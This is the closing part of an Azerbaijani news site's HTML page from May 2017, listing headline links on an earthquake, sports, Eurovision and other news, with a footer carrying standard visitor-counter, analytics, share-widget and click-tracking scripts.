              <a class="pull-left" href="http://www.xebersaati.com/news/49026-iranla-ve-turkmenistan-serhedi-5-8-bal-gucunde-zelzele-olub/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn2.trend.az/media/pictures/2014/02/10/earthquake_100214_2.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49026-iranla-ve-turkmenistan-serhedi-5-8-bal-gucunde-zelzele-olub/">İranla və Türkmənistan sərhədi 5,8 bal gücündə zəlzələ olub</a></div>
                <small>2017-05-14 00:54 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49023-xacmazda-56-yashli-kishi-intihar-edib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/intihar.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49023-xacmazda-56-yashli-kishi-intihar-edib/">Xaçmazda 56 yaşlı kişi intihar edib</a></div>
                <small>2017-05-14 00:50 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49017-azerbaycan-voleybolculari-turkiye-yigmasini-meglub-edib/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/05/10/volleyball_baku_2017.png"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49017-azerbaycan-voleybolculari-turkiye-yigmasini-meglub-edib/">Azərbaycan voleybolçuları Türkiyə yığmasını məğlub edib</a></div>
                <small>2017-05-14 00:34 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 3</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49014-mariana-vasilyeva-bu-gun-qazandigimiz-qizil-medal-tarixidir/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn2.trend.az/media/pictures/2015/05/19/trend_mariana_vasileva_190515.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49014-mariana-vasilyeva-bu-gun-qazandigimiz-qizil-medal-tarixidir/">Mariana Vasilyeva: Bu gün qazandığımız qızıl medal tarixidir</a></div>
                <small>2017-05-14 00:20 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 2</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49013-iranda-terror-aktinin-qarshisi-alinib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/1476991926.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49013-iranda-terror-aktinin-qarshisi-alinib/">İranda terror aktının qarşısı alınıb</a></div>
                <small>2017-05-14 00:19 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 4</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49011-diana-haciyeva-eurovision-2017-mahni-musabiqesinin-finalinda-cixish-edib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/14/big/892003.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49011-diana-haciyeva-eurovision-2017-mahni-musabiqesinin-finalinda-cixish-edib/">Diana Hacıyeva “Eurovision 2017” mahnı müsabiqəsinin finalında çıxış edib</a></div>
                <small>2017-05-14 00:01 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/49007-prezident-ve-aile-uzvleri-islamiada-cercivesinde-cudo-yarishlarinin-final-qarshilashmalarina-baxib/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/may/13/big/001.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/49007-prezident-ve-aile-uzvleri-islamiada-cercivesinde-cudo-yarishlarinin-final-qarshilashmalarina-baxib/">Prezident və ailə üzvləri İslamiada çərçivəsində cüdo yarışlarının final qarşılaşmalarına baxıb</a></div>
                <small>2017-05-13 23:42 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 9</small>
              </div>
            </li></ul></div>    </div><!-- row -->

    <footer>
    	<hr>
    	<p class="text-center"><small>Saytdakı materialların istifadəsi zamanı istinad edilməsi vacibdir. Məlumat internet səhifələrində istifadə edildikdə hiperlink vasitəsi ilə istinad mütləqdir.</small><br>Copyright © 2016 All rights reserved. </p>
    	<p class="text-center">
    	  <!--LiveInternet counter--><script type="text/javascript"><!--
          document.write("<img src='//counter.yadro.ru/hit?t29.3;r"+
          escape(document.referrer)+((typeof(screen)=="undefined")?"":
          ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
          ";h"+escape(document.title.substring(0,80))+";"+Math.random()+
          "' alt='' title='LiveInternet: number of visitors and pageviews"+
          " is shown' "+
          "border='0' width='88' height='120'>")
          //--></script><!--/LiveInternet-->
          <img border=0 alt='ILK-10 Azeri Website Directory' src='http://www.ilk10.az/counter/count3.php?color=liliac&id=36590'>
    	</p>
    </footer>
    </div><!-- container -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script type="text/javascript" src="js/bootstrap.min.js"></script>
    <script type="text/javascript">
    	$('.xeberMetni iframe').wrap('<div class="embed-responsive embed-responsive-16by9"></div>');
    	$(".embed-responsive").before('<div class="clearfix"></div>');$(".xeberMetni iframe").addClass('embed-responsive-item');
      var flag="false";
      $("#kategoriyalarButton").click(function(){
        if(flag=="false")
          {$('#kategoriyalar').show(200); flag="true"; $("#kategoriyalarButton button").html('Kategoriyaları gizlət <i class="fa fa-angle-double-up" aria-hidden="true"></i>');} 
        else 
          {$('#kategoriyalar').hide(200); flag="false"; $("#kategoriyalarButton button").html('Kategoriyaları göstər <i class="fa fa-angle-double-down" aria-hidden="true"></i>');}
        
      });
    </script>
    <!--Google Analytics-->
	  <script>
	    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	    ga('create', 'UA-31581333-12', 'auto');
	    ga('send', 'pageview');

	  </script>
	  <!--Google Analytics-->
	  <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5709013e408ef89c"></script>
	  <script type="text/javascript">jQuery.ajax({type: "GET",url: "http://topmedia.az/click.php"});</script>
  </body>
</html>
